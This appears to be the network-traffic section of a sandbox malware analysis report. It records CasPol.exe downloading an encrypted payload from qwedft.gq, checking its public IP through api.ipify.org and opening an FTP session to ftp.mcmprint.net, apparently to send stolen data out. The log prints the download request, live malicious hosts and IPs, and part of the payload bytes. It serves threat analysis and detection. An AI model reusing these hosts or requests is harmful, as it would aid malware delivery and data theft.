                                  Nov 29, 2022 18:34:33.298871994 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.298886061 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.298927069 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.298934937 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.298981905 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.299031019 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.299037933 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.299079895 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.299093962 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.299149036 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.299202919 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.299217939 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.299257994 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.299269915 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.299313068 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.299365997 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.299372911 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.299421072 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.299421072 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.299475908 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.299530029 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.299577951 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.299587011 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.299627066 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.299642086 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.299696922 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.299722910 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.299751043 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.299787045 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.299806118 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.299860954 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.299890041 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.299916029 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.299938917 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.299971104 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.300024986 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.300029039 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.300080061 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.300132990 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.300134897 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.300187111 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.300242901 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.300262928 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.300297976 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.300301075 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.300374985 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.300386906 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.300431013 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.300484896 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.300486088 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.300539017 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.300592899 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.300596952 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.300632954 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.300647020 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.300702095 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.300755024 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.300755978 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.300810099 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.300811052 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.300865889 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.300920963 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.300955057 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.300977945 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.301009893 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.301033974 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.301071882 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.301145077 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.301280022 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.459498882 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.459597111 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.459665060 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.459724903 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.459732056 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.459772110 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.459822893 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.459841967 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.459913015 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.459929943 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.459996939 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.460062027 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.460098028 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.460138083 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.460172892 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.460220098 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.460226059 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.460318089 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.460325003 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.460433960 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.460478067 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.460513115 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.460582018 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.460585117 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.460659981 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.460675955 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.460743904 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.460807085 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.460835934 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.460882902 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.460890055 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.460962057 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.460968018 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.461044073 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.461061954 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.461167097 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.461174965 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.461230040 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.461256027 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.461318016 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.461339951 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:33.461407900 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:33.461524963 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:38.444981098 CET49857443192.168.11.2052.20.78.240
                                  Nov 29, 2022 18:34:38.444999933 CET4434985752.20.78.240192.168.11.20
                                  Nov 29, 2022 18:34:38.445147991 CET49857443192.168.11.2052.20.78.240
                                  Nov 29, 2022 18:34:38.466295004 CET8049855162.240.62.179192.168.11.20
                                  Nov 29, 2022 18:34:38.466401100 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:34:38.508946896 CET49857443192.168.11.2052.20.78.240
                                  Nov 29, 2022 18:34:38.508960962 CET4434985752.20.78.240192.168.11.20
                                  Nov 29, 2022 18:34:38.819844961 CET4434985752.20.78.240192.168.11.20
                                  Nov 29, 2022 18:34:38.820056915 CET49857443192.168.11.2052.20.78.240
                                  Nov 29, 2022 18:34:38.821578979 CET49857443192.168.11.2052.20.78.240
                                  Nov 29, 2022 18:34:38.821604967 CET4434985752.20.78.240192.168.11.20
                                  Nov 29, 2022 18:34:38.822200060 CET4434985752.20.78.240192.168.11.20
                                  Nov 29, 2022 18:34:38.873029947 CET49857443192.168.11.2052.20.78.240
                                  Nov 29, 2022 18:34:39.492594957 CET49857443192.168.11.2052.20.78.240
                                  Nov 29, 2022 18:34:39.536344051 CET4434985752.20.78.240192.168.11.20
                                  Nov 29, 2022 18:34:39.640558958 CET4434985752.20.78.240192.168.11.20
                                  Nov 29, 2022 18:34:39.640620947 CET4434985752.20.78.240192.168.11.20
                                  Nov 29, 2022 18:34:39.640758991 CET49857443192.168.11.2052.20.78.240
                                  Nov 29, 2022 18:34:39.642118931 CET49857443192.168.11.2052.20.78.240
                                  Nov 29, 2022 18:34:46.630266905 CET4985821192.168.11.20185.31.121.136
                                  Nov 29, 2022 18:34:46.662286997 CET2149858185.31.121.136192.168.11.20
                                  Nov 29, 2022 18:34:46.662487030 CET4985821192.168.11.20185.31.121.136
                                  Nov 29, 2022 18:34:46.696629047 CET2149858185.31.121.136192.168.11.20
                                  Nov 29, 2022 18:34:46.696991920 CET4985821192.168.11.20185.31.121.136
                                  Nov 29, 2022 18:34:46.729441881 CET2149858185.31.121.136192.168.11.20
                                  Nov 29, 2022 18:34:46.729505062 CET2149858185.31.121.136192.168.11.20
                                  Nov 29, 2022 18:34:46.729799986 CET4985821192.168.11.20185.31.121.136
                                  Nov 29, 2022 18:34:46.780364990 CET2149858185.31.121.136192.168.11.20
                                  Nov 29, 2022 18:34:46.780805111 CET4985821192.168.11.20185.31.121.136
                                  Nov 29, 2022 18:34:46.813596010 CET2149858185.31.121.136192.168.11.20
                                  Nov 29, 2022 18:34:46.813944101 CET4985821192.168.11.20185.31.121.136
                                  Nov 29, 2022 18:34:46.846718073 CET2149858185.31.121.136192.168.11.20
                                  Nov 29, 2022 18:34:46.847259998 CET4985821192.168.11.20185.31.121.136
                                  Nov 29, 2022 18:34:46.879990101 CET2149858185.31.121.136192.168.11.20
                                  Nov 29, 2022 18:34:46.880294085 CET4985821192.168.11.20185.31.121.136
                                  Nov 29, 2022 18:34:46.912998915 CET2149858185.31.121.136192.168.11.20
                                  Nov 29, 2022 18:34:46.913393021 CET4985821192.168.11.20185.31.121.136
                                  Nov 29, 2022 18:34:46.946330070 CET2149858185.31.121.136192.168.11.20
                                  Nov 29, 2022 18:34:46.947611094 CET4985959772192.168.11.20185.31.121.136
                                  Nov 29, 2022 18:34:46.980201960 CET5977249859185.31.121.136192.168.11.20
                                  Nov 29, 2022 18:34:46.980681896 CET4985959772192.168.11.20185.31.121.136
                                  Nov 29, 2022 18:34:46.981738091 CET4985821192.168.11.20185.31.121.136
                                  Nov 29, 2022 18:34:47.016505957 CET2149858185.31.121.136192.168.11.20
                                  Nov 29, 2022 18:34:47.016884089 CET4985959772192.168.11.20185.31.121.136
                                  Nov 29, 2022 18:34:47.016884089 CET4985959772192.168.11.20185.31.121.136
                                  Nov 29, 2022 18:34:47.049233913 CET5977249859185.31.121.136192.168.11.20
                                  Nov 29, 2022 18:34:47.049321890 CET5977249859185.31.121.136192.168.11.20
                                  Nov 29, 2022 18:34:47.049491882 CET2149858185.31.121.136192.168.11.20
                                  Nov 29, 2022 18:34:47.049658060 CET4985959772192.168.11.20185.31.121.136
                                  Nov 29, 2022 18:34:47.049741030 CET4985821192.168.11.20185.31.121.136
                                  Nov 29, 2022 18:36:22.350461960 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:36:22.756478071 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:36:23.553117990 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:36:25.146455050 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:36:26.412028074 CET4985821192.168.11.20185.31.121.136
                                  Nov 29, 2022 18:36:26.444715977 CET2149858185.31.121.136192.168.11.20
                                  Nov 29, 2022 18:36:26.444988012 CET4985821192.168.11.20185.31.121.136
                                  Nov 29, 2022 18:36:26.445353985 CET2149858185.31.121.136192.168.11.20
                                  Nov 29, 2022 18:36:26.445552111 CET4985821192.168.11.20185.31.121.136
                                  Nov 29, 2022 18:36:28.317639112 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:36:34.644427061 CET4985580192.168.11.20162.240.62.179
                                  Nov 29, 2022 18:36:47.297863007 CET4985580192.168.11.20162.240.62.179
                                  TimestampSource PortDest PortSource IPDest IP
                                  Nov 29, 2022 18:34:32.433917046 CET5655753192.168.11.201.1.1.1
                                  Nov 29, 2022 18:34:32.476682901 CET53565571.1.1.1192.168.11.20
                                  Nov 29, 2022 18:34:38.424631119 CET5093453192.168.11.201.1.1.1
                                  Nov 29, 2022 18:34:38.434093952 CET53509341.1.1.1192.168.11.20
                                  Nov 29, 2022 18:34:46.357691050 CET5613453192.168.11.201.1.1.1
                                  Nov 29, 2022 18:34:46.629107952 CET53561341.1.1.1192.168.11.20
                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Nov 29, 2022 18:34:32.433917046 CET192.168.11.201.1.1.10x7526Standard query (0)qwedft.gqA (IP address)IN (0x0001)false
                                  Nov 29, 2022 18:34:38.424631119 CET192.168.11.201.1.1.10x2534Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                  Nov 29, 2022 18:34:46.357691050 CET192.168.11.201.1.1.10x1eecStandard query (0)ftp.mcmprint.netA (IP address)IN (0x0001)false
                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Nov 29, 2022 18:34:32.476682901 CET1.1.1.1192.168.11.200x7526No error (0)qwedft.gq162.240.62.179A (IP address)IN (0x0001)false
                                  Nov 29, 2022 18:34:38.434093952 CET1.1.1.1192.168.11.200x2534No error (0)api.ipify.orgapi.ipify.org.herokudns.comCNAME (Canonical name)IN (0x0001)false
                                  Nov 29, 2022 18:34:38.434093952 CET1.1.1.1192.168.11.200x2534No error (0)api.ipify.org.herokudns.com52.20.78.240A (IP address)IN (0x0001)false
                                  Nov 29, 2022 18:34:38.434093952 CET1.1.1.1192.168.11.200x2534No error (0)api.ipify.org.herokudns.com3.220.57.224A (IP address)IN (0x0001)false
                                  Nov 29, 2022 18:34:38.434093952 CET1.1.1.1192.168.11.200x2534No error (0)api.ipify.org.herokudns.com54.91.59.199A (IP address)IN (0x0001)false
                                  Nov 29, 2022 18:34:38.434093952 CET1.1.1.1192.168.11.200x2534No error (0)api.ipify.org.herokudns.com3.232.242.170A (IP address)IN (0x0001)false
                                  Nov 29, 2022 18:34:46.629107952 CET1.1.1.1192.168.11.200x1eecNo error (0)ftp.mcmprint.net185.31.121.136A (IP address)IN (0x0001)false
                                  • api.ipify.org
                                  • qwedft.gq
                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  0192.168.11.204985752.20.78.240443C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                  TimestampkBytes transferredDirectionData


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  1192.168.11.2049855162.240.62.17980C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                  TimestampkBytes transferredDirectionData
                                  Nov 29, 2022 18:34:32.644968033 CET148OUTGET /Akkant/VUUby127.xsn HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Host: qwedft.gq
                                  Cache-Control: no-cache
                                  Nov 29, 2022 18:34:32.811785936 CET149INHTTP/1.1 200 OK
                                  Date: Tue, 29 Nov 2022 17:34:31 GMT
                                  Server: Apache
                                  Upgrade: h2,h2c
                                  Connection: Upgrade
                                  Last-Modified: Tue, 29 Nov 2022 01:34:50 GMT
                                  Accept-Ranges: bytes
                                  Content-Length: 222272
                                  Data Raw: 22 23 98 75 24 63 6c 66 38 c9 fe 6a 65 96 ca 76 db 4a 02 b4 be fa ea d8 6d 23 69 53 1e 22 a6 61 cd b0 0b 1f 1d f2 69 38 a4 89 f8 a1 f5 ff c9 74 f4 47 5a 4d 4b e5 61 72 71 66 91 27 bb eb 77 98 1e fe 29 d9 40 bf 67 3f 0f cf f9 d3 e1 7f 35 20 6e 08 89 84 7d a7 5e b2 4a 48 41 68 4b fc f9 a5 37 8f c7 b1 ec be 58 02 65 b7 33 04 2e 83 79 b4 40 3b c2 26 c5 65 58 73 ca 6e 4d e6 e2 8d 73 57 19 35 81 17 35 a0 42 4c 0f 9d 7c a4 26 dd 55 59 2b 6b 77 8f e4 0e 08 af 52 23 3a 04 df b9 3a 28 44 72 b0 33 95 81 f9 da 26 e8 16 b8 fa 7f 18 10 46 24 90 57 72 10 b2 05 51 78 c4 ed 50 92 12 06 29 97 eb 85 e4 b1 4b 9a a3 c1 2e a8 1a c4 eb 2f af 4c 9f 5f 02 bb d8 75 e2 ee b5 a8 56 1e b2 ac 01 ea 43 df 2d da bd 16 1b 0c d4 24 a2 37 d5 f5 9f 22 cc f9 4a 3e 15 f6 f0 9f 67 95 8c 9b 04 bc ed b8 a5 c1 2e b0 7e 78 7f 62 d7 7d b4 92 e2 5d 4c 1a 69 76 7b 2c cf 16 10 38 b8 fe b9 48 93 fd e7 a6 d5 6a f5 a0 06 74 60 4b a9 87 11 1c 98 55 62 a7 4c d4 30 18 61 c0 87 39 85 9a 87 a5 5f 58 67 38 08 bd 33 bb 7a 1d 48 74 af dc 2e 5d 93 71 86 e9 4a b9 28 11 d4 e2 43 a9 35 89 23 f5 97 6d f6 49 4f 6c a2 c0 f5 e1 af 66 21 63 ab e7 78 6d 60 b7 58 36 d6 82 71 92 1b 14 9f 42 a9 6b da 1d 57 b4 c8 0a 9c 47 08 51 e5 a6 f4 59 6b f1 67 77 3e cd ca 7b 00 42 e0 50 16 fa 89 db f2 40 dd 34 d7 e6 b3 dc e6 c0 f6 b2 58 35 e8 37 c1 2d d9 a3 52 31 a6 22 48 24 2d e3 c5 94 57 f6 2f e3 e4 a0 35 b7 f1 19 3b 08 de ec 8c dc 88 aa f1 bd 0e fb 14 17 8e f7 a8 38 18 1d ee 5b 72 2b d4 9f 63 6c 23 a1 a8 72 4e e7 6f af b1 08 98 43 d8 6e a8 6c b4 92 97 8a af 84 a4 cb b4 7d 2a ad 04 a6 9a a9 48 67 bc ef 33 de 7d 6a c5 67 7f fd 23 ef 76 91 1d 7c 5d 41 27 db 6f c1 f4 b7 50 2f a4 f2 88 b7 c0 b6 8d 63 cf 97 a8 38 6d ec 27 fe 1b 68 03 06 4e 46 26 36 b2 ae 07 8c 5d 84 8b 51 90 56 81 d5 ee 96 13 2b 3c a1 35 27 9f 1d 27 8d b7 a5 56 a5 26 5e ef a9 4c aa b4 56 d7 b7 c8 66 6c dd 4d 42 55 91 23 5b 81 23 f2 c9 a1 e7 5e 66 e9 91 e6 66 a9 c5 49 09 af 0e 95 ef 3d 76 90 22 97 ec 83 be e0 73 65 2d 1a 98 be d6 ff e1 8c 22 05 9a fd fb 21 16 c4 e5 03 8c 62 43 66 97 87 d0 79 e2 15 25 8f 0f d1 72 22 86 b6 08 f0 28 71 80 06 b3 9b e7 1b 5a 4a 1b a6 f8 f5 53 cc bf 44 44 7d bb 9a 5e c8 b1 0b 51 3f 8a 39 4f af 75 db ab 83 8f 74 49 96 14 22 c7 ac 35 14 a7 e9 48 ed 6c 3d ea 75 00 84 80 33 70 44 80 6d 12 d9 50 10 39 95 3c 95 f3 89 f6 b3 f8 cb 4f fa 75 5a b6 56 14 df b4 a9 39 8d 8b e8 6b 55 2a 98 3f e7 63 ac 48 a2 2a 97 36 59 28 46 cd 29 5f 37 80 29 9d 3b 48 8d 25 d6 c9 18 d0 b3 91 79 e7 ff 30 f0 69 50 a3 db 91 fe 91 9a 68 6b 43 f0 a2 66 70 9f 09 b3 bd 89 01 4b 7d 0b e3 e6 19 dc 8c f4 68 9c 8a 2c d0 a3 1b 84 af a9 4e d4 96 fc d5 a1 d8 c5 c8 62 65 9e d8 5e 3e fd 9b 71 8f a2 f8 22 3c 9e 52 30 1c db 10 7b 39 60 44 61 44 2a 54 f6 53 88 b9 d9 43 bb 67 3f 1a d9 f2 f8 05 80 32 37 28 09 a5 86 65 ac 5e b5 1c b6 40 44 49 eb f2 a5 30 97 39 b0 c0 bc 73 00 4e 54 4d 00 2e 83 7d db 4d 3b c2 2c ef 76 68 71 ca 40 4d e6 62 88 73 57 06 3c 30 32 2e 14 4c 96 d0 24 51 ea f3 f7 01 36 54 e6 56 d3 94 76 64 dd 34 56 e4 66 92 d5 7f 45 1b b1 d0 55 9d e2 8c b4 0c a9 6a 98 be 3a 61 30 2b 58 c4 30 5c 35 bf 0f 75 7e c4 ed 41 84 19 2d 62 d2 ec 92 56 b1 64 98 af 01 5b cc 0c 3a ea 03 ad 5b 94 5f e5 a3 24 75 c5 ed 96 aa 7d a1 b3 84 12 ec 43 d5 07 c9 8d 14 35 5b d7 24 a2 10 d5 f5 8e 34 c7 d2 51 3e 52 e1 0e be 4b 97 94 92 04 bb ff 46 a4 ed 2c
                                  Data Ascii: "#u$clf8jevJm#iS"ai8tGZMKarqf'w)@g?5 n}^JHAhK7Xe3.y@;&eXsnMsW55BL|&UY+kwR#::(Dr3&F$WrQxP)K./L_uVC-$7"J>g.~xb}]Liv{,8Hjt`KUbL0a9_Xg83zHt.]qJ(C5#mIOlf!cxm`X6qBkWGQYkgw>{BP@4X57-R1"H$-W/5;8[r+cl#rNoCnl}*Hg3}jg#v|]A'oP/c8m'hNF&6]QV+<5''V&^LVflMBU#[#^ffI=v"se-"!bCfy%r"(qZJSDD}^Q?9OutI"5Hl=u3pDmP9<OuZV9kU*?cH*6Y(F)_7);H%y0iPhkCfpK}h,Nbe^>q"<R0{9`DaD*TSCg?27(e^@DI09sNTM.}M;,vhq@MbsW<02.L$Q6TVvd4VfEUj:a0+X0\5u~A-bVd[:[_$u}C5[$4Q>RKF,
                                  Nov 29, 2022 18:34:32.811892033 CET150INData Raw: a7 75 78 7c 7a 29 7c 98 90 c9 5f 67 39 ba 73 7b 2e cd 3e 04 38 b8 f4 91 5b e3 7a e7 8e c5 6a f5 b8 06 74 71 5d b2 ac 0a 0c 9f 42 9c a6 60 d6 38 13 61 c7 91 c7 84 b6 85 b2 54 58 80 5a f5 bc 54 b9 51 1f 63 17 ae f4 23 5e 93 7b ac fa 7a bb 28 52 d4
                                  Data Ascii: ux|z)|_g9s{.>8[zjtq]B`8aTXZTQc#^{z(RC52FKuPg!cbf`@{BF\bF$S^}f[<{XQ:P7.$"H?+b2q;8Z^%c_-BD@'
                                  Nov 29, 2022 18:34:32.811969995 CET152INData Raw: 2d 1a 14 b6 fb 6b eb 77 3d e7 4a 8f 87 ac 37 40 61 80 6a 0e 0f 7e 3c 3b 88 b7 8b f4 91 0c cc f6 c9 64 fc 72 b3 e0 c5 14 df b6 46 12 8d 8b e6 6b 58 18 89 0f c8 63 af 4b a0 2a 99 27 4f 32 7b c5 21 60 d5 7c 28 b1 39 41 8e 3a c0 21 e7 fd 93 82 6b fb
                                  Data Ascii: -kw=J7@aj~<;drFkXcK*'O2{!`|(9A:!k[hvH%qf;Vq4sQh3YB(EI^},74?(Z9dLCo 1? ^[IhZxb3z?yh&4nM}`_;3?J817
                                  Nov 29, 2022 18:34:32.812066078 CET153INData Raw: b6 ec 78 6a 7e 49 59 1a d3 a9 40 8d 12 1f 9f 45 b6 62 24 1c 7b b1 df 00 83 4d 03 51 e2 bd 0a 58 47 f8 19 41 3e cd ce 57 ed 5e eb 50 11 cd 77 da d6 42 c5 3f d7 e1 ac d6 18 c1 da b4 56 39 b5 28 82 26 d9 a4 4d 3a 58 23 64 39 53 d4 eb e0 36 f0 63 e3
                                  Data Ascii: xj~IY@Eb${MQXGA>W^PwB?V9(&M:X#d9S6c?V!XX1dSo1'gt}-XJL\!Wr|]A6{lP/c8mT[hNHnl62Q]!/'B5l^S}L
                                  Nov 29, 2022 18:34:32.812189102 CET154INData Raw: 96 b6 39 71 06 26 e3 e6 06 d5 81 f4 70 95 8d f9 ca 8f 01 91 3e c6 62 d6 84 df 5e a4 ce 3d e1 7c 67 89 d5 76 b5 e7 65 76 8b 8e d3 20 11 62 21 3e 1c d2 0c ea 34 4c 48 15 66 39 64 f0 69 68 b9 d9 43 a6 6a 3f 02 d2 07 d2 32 87 0d 14 d7 08 89 9a 70 a7
                                  Data Ascii: 9q&p>b^=|gvev b!>4LHf9dihCj?2pWImqc{1p3e59R@=/eQlL=9*1K/)ut1D_o7fke|%2R9`72K6Cy~jMQ@YfLUtVKo/5}"bW
                                  Nov 29, 2022 18:34:32.812350035 CET156INData Raw: f7 a8 32 0e 2c 08 41 79 2b f3 88 9d 0d 21 d1 c3 0b 2d e0 77 51 a8 27 95 6b b2 ef ab 6a c0 9e 97 8a b4 d0 be c0 b4 7a 3c 53 05 8a 98 be 43 67 bb f0 79 20 7c 06 e9 3e 1f a9 12 73 89 6e 3b 7c 5d 5a 17 73 6c 38 f4 b5 50 37 a4 90 9a c4 b9 b6 8d 69 c5
                                  Data Ascii: 2,Ay+!-wQ'kjz<SCgy |>sn;|]Zsl8P7iBm-cDNT$VVi-&,*'*BgKPf{bDURY`K&=|2+ubBK"?bq{F/r$B"]XJ3o+[
                                  Nov 29, 2022 18:34:32.812485933 CET157INData Raw: 04 2e ae 79 b4 41 3b c2 26 c5 65 58 73 ca 44 4c e6 62 a7 72 57 17 26 3b 19 35 39 4b 81 2f 3e 4d ec eb 8c 03 31 42 03 57 ff 87 49 7a df 33 48 10 14 82 d7 54 41 23 54 ac 5a b5 f3 88 98 57 90 7e e6 ae 30 4b 34 44 75 f4 32 5a 0b 41 0e 0b 68 c4 ed 54
                                  Data Ascii: .yA;&eXsDLbrW&;59K/>M1BWIz3HTA#TZW~0K4Du2ZAhTwJu/]wFrVBC?$U"LQhx |PbwJJx{xcP<QB~sFoUf< "8C&BtNV(]1`;(04%
                                  Nov 29, 2022 18:34:32.812616110 CET159INData Raw: 8b 5b 99 39 33 d5 fe e7 7f 9c 3c a1 3f 23 fb 1b 23 e2 32 a5 53 af 9c cb c8 81 70 4a b4 5c c7 be e0 27 7d dd 47 9a 55 bb 62 47 81 23 f2 c9 a1 e7 5e 66 e9 91 02 67 a9 c5 ad 08 af 0e 9a ef 3d 76 bd 22 97 ed 98 8e ea 73 dd 2d 1a 98 a3 d6 ff f0 f2 0e
                                  Data Ascii: [93<?##2SpJ\'}GUbG#^fg=v"s-NGix]y{J|s)H$(q/JESo+[OOUvC$_UKp=c0O`,Q<1hdR#%+D)FdH>3g{m#p~(V%Vd2?Y
                                  Nov 29, 2022 18:34:32.812730074 CET160INData Raw: b7 e2 e0 bb dc 78 e7 ea d2 6c 56 42 bb c3 c4 ec 43 d5 3e ce 96 5f 24 63 b8 69 a2 17 df dd ce 22 cc f3 59 32 44 f0 f7 a9 60 1b 3b f6 92 bc e9 b2 ad d0 22 be 7b 69 77 0d 11 7d b4 98 ca 9a 4c da 60 65 71 06 b9 16 10 32 a9 f4 d4 3f d3 78 ed b5 ce 7b
                                  Data Ascii: xlVBC>_$ci"Y2D`;"{iw}L`eq2?x{bq@70~UhXva[*BtnhY q5[/l#Jh%Kcxgm.6xlHoF>sSzca:C}BZ>hg6Yx:7BR;%Y"<5rT
